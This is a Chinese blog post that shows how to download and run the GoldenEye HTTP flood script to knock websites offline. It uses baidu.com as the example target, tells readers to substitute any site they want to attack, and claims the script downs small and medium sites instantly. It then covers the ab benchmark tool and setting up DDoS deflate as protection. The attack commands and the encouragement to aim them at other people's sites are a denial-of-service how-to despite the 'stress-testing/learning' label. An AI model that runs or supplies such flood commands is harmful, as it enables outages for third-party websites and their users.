Linux服务器发动CC(ddos)攻击脚本里包含有防护《测压学习防护专用》

浩宇 帝一

发表文章数:95

CC脚本

首先我们先使用Linux服务器wget下载脚本

  1. wget https://www.diyigzs.com/jiaoben/cc/goldeneye.py

这个脚本简称黄金眼 威力巨大 我试过秒中小型站点
但是脚本设置默认50并发 持续30秒 时间有点短 可以自己去改改脚本 相信大家都能看懂 根据自己服务器稍调一下
给予goldeneye.py脚本权限

  1. chmod +x goldeneye.py

攻击命令

  1. ./goldeneye.py http://www.baidu.com

把百度那个链接改成你想要攻击的网站即可
加大线程

  1. ./goldeneye.py www.baidu.com/ -s 300 -w 300

意思就是300并发压制300秒

ddos脚本

安装攻击ddos脚本

  1. yum install -y httpd  #安装httpd
  2. systemctl start httpd  #开启httpd
  3. echo "i am a student" > /var/www/html/index.html  #向httpd默认得目录下放一个页面
  4. vim ddos.sh  #写ddos脚本
  5. #!/bin/bash  #模拟ddos进行攻击(网址可以改成自己本地IP或者是本地的回环地址127.0.0.1)
  6. netstat -ntu | awk '{print $5}' | cut -d: -f4 | sort | uniq -c | sort -n  #脚本运行
  7. ab -n 1000 -c 100 http://192.168.1.63/index.html  #ab命令:做压力测试的工具和性能的监控工具语法: ab -n 要产生的链接数总和 -c 同时打开的客户端数量 http://链接
  8. sh ddos.sh

 

  1. yum -y install httpd-tools  #ab(apache benchmark)安装
  2. ab 或 ab -help  #ab测试的命令参数
  3. 内容解释:
  4. 此外,我们再根据上面的用法介绍界面来详细了解每个参数选项的作用。
  5. -n 即requests,用于指定压力测试总共的执行次数。
  6. -c 即concurrency,用于指定的并发数。
  7. -t 即timelimit,等待响应的最大时间(单位:秒)。
  8. -b 即windowsize,TCP发送/接收的缓冲大小(单位:字节)。
  9. -p 即postfile,发送POST请求时需要上传的文件,此外还必须设置-T参数。
  10. -u 即putfile,发送PUT请求时需要上传的文件,此外还必须设置-T参数。
  11. -T 即content-type,用于设置Content-Type请求头信息,例如:application/x-www-form-urlencoded,默认值为text/plain。
  12. -v 即verbosity,指定打印帮助信息的冗余级别。
  13. -w 以HTML表格形式打印结果。
  14. -i 使用HEAD请求代替GET请求。
  15. -x 插入字符串作为table标签的属性。
  16. -y 插入字符串作为tr标签的属性。
  17. -z 插入字符串作为td标签的属性。
  18. -C 添加cookie信息,例如:"Apache=1234"(可以重复该参数选项以添加多个)。
  19. -H 添加任意的请求头,例如:"Accept-Encoding: gzip",请求头将会添加在现有的多个请求头之后(可以重复该参数选项以添加多个)。
  20. -A 添加一个基本的网络认证信息,用户名和密码之间用英文冒号隔开。
  21. -P 添加一个基本的代理认证信息,用户名和密码之间用英文冒号隔开。
  22. -X 指定使用的和端口号,例如:"126.10.10.3:88"。
  23. -V 打印版本号并退出。
  24. -k 使用HTTP的KeepAlive特性。
  25. -d 不显示百分比。
  26. -S 不显示预估和警告信息。
  27. -g 输出结果信息到gnuplot格式的文件中。
  28. -e 输出结果信息到CSV格式的文件中。
  29. -r 指定接收到错误信息时不退出程序。
  30. -h 显示用法信息,其实就是ab -help。

使用
  1. ab -c 100 -n 10000 待测试网站(建议完整路径)#模拟并发请求100次,总共请求10000次
  2. 内容解释:
  3. Server Software: nginx/1.10.2 (服务器软件名称及版本信息)
  4. Server Hostname: 192.168.1.106(服务器主机名)
  5. Server Port: 80 (服务器端口)
  6. Document Path: /index1.html. (供测试的URL路径)
  7. Document Length: 3721 bytes (供测试的URL返回的文档大小)
  8. Concurrency Level: 1000 (并发数)
  9. Time taken for tests: 2.327 seconds (压力测试消耗的总时间)
  10. Complete requests: 5000 (的总次数)
  11. Failed requests: 688 (失败的请求数)
  12. Write errors: 0 (网络连接写入错误数)
  13. Total transferred: 17402975 bytes (传输的总数据量)
  14. HTML transferred: 16275725 bytes (HTML文档的总数据量)
  15. Requests per second: 2148.98 [#/sec] (mean) (平均每秒的请求数) 这个是非常重要的参数数值,服务器的吞吐量
  16. Time per request: 465.338 [ms] (mean) (所有并发用户(这里是1000)都请求一次的平均时间)
  17. Time request: 0.247 [ms] (mean, across all concurrent requests) (单个用户请求一次的平均时间)
  18. Transfer rate: 7304.41 [Kbytes/sec] received 每秒获取的数据长度 (传输速率,单位:KB/s) ... Percentage of the requests served within a certain time (ms) 50% 347 ## 50%的请求在347ms内返回 66% 401 ## 60%的请求在401ms内返回 75% 431 80% 516 90% 600 95% 846 98% 1571 99% 1593 100% 1619 (longest request)

配置防护ddos脚本

下面是DDoS deflate的默认配置位于/usr/local/ddos/ddos.conf ,内容如下:##### KILL=1 (Recommended setting)

  1. wget http://www.inetbase.com/scripts/ddos/install.sh //下载
  2. DDoS deflate chmod 0700 install.sh 或 chmod 700 install.sh //添加权限
  3. ./install.sh //执行

用户可根据给默认配置文件加上的注释提示内容,修改配置文件。

  1. ##### Paths of the script and other files PROGDIR="/usr/local/ddos" PROG="/usr/local/ddos/ddos.sh" IGNORE_IP_LIST="/usr/local/ddos/ignore.ip.list" //IP地址白名单 CRON="/etc/cron.d/ddos.cron" //定时执行程序 APF="/etc/apf/apf" IPT="/sbin/iptables" ##### frequency in minutes for running the script ##### Caution: Every time this setting is changed, run the script with --cron ##### option so that the new frequency takes effect FREQ=1 //检查时间间隔,默认1分钟 ##### How many connections define a bad IP? Indicate that below. NO_OF_CONNECTIONS=150 //最大连接数,超过这个数IP就会被屏蔽,一般默认即可 ##### APF_BAN=1 (Make sure your APF version is atleast 0.96) ##### APF_BAN=0 (Uses iptables for banning ips instead of APF) APF_BAN=1 //使用APF还是iptables。推荐使用iptables,将APF_BAN的值改为0即可。 ##### KILL=0 (Bad IPs are'nt banned, good for interactive execution of script) ##### KILL=1 (Recommended setting) KILL=1 //是否屏蔽IP,默认即可 ##### An email is sent to the following address when an IP is banned. ##### Blank would suppress sending of mails EMAIL_TO="user@mail.com" //当IP被屏蔽时给指定邮箱发送邮件,推荐使用,换成自己的邮箱即可 ##### Number of seconds the banned ip should remain in blacklist. BAN_PERIOD=600 //禁用IP时间,默认600秒,可根据情况调整

查看/usr/local/ddos/ddos.sh文件的第117行

  1. netstat -ntu | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -nr > $BAD_IP_LIST#修改为以下代码即可!
  2. netstat -ntu | awk ‘{print $5}’ | cut -d: -f1 | sed -n ‘/[0-9]/p’ | sort | uniq -c | sort -nr > $BAD_IP_LIST

喜欢折腾的可以用Web压力测试软件测试一下效果,相信DDoS deflate还是能给你的VPS或服务器抵御一部分DDOS攻击,给你的网站更多的保护。

未经允许不得转载:作者:帝一, 转载或复制请以 超链接形式 并注明出处 帝一天博
原文地址:《Linux服务器发动CC(ddos)攻击脚本里包含有防护《测压学习防护专用》》 发布于2020-02-22, 本文最后更新于2020年2月22日,已超过138天没有更新,如果文章内容失效,请反馈给我们,谢谢!

分享到:
赞(0) 打赏 生成海报

评论 抢沙发

评论前必须登录!

  注册



长按图片转发给朋友

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

帝一天博
在此声明如有侵权,违规等请发我邮箱(admin@diyigzs.com)告知。本人会看到立即删除!! 温馨提示:最近少出门小心传染谢谢大家配合
隐藏
变装
切换注册

登录

忘记密码 ?

您也可以使用第三方帐号快捷登录

Q Q 登 录
微 博 登 录
切换登录

注册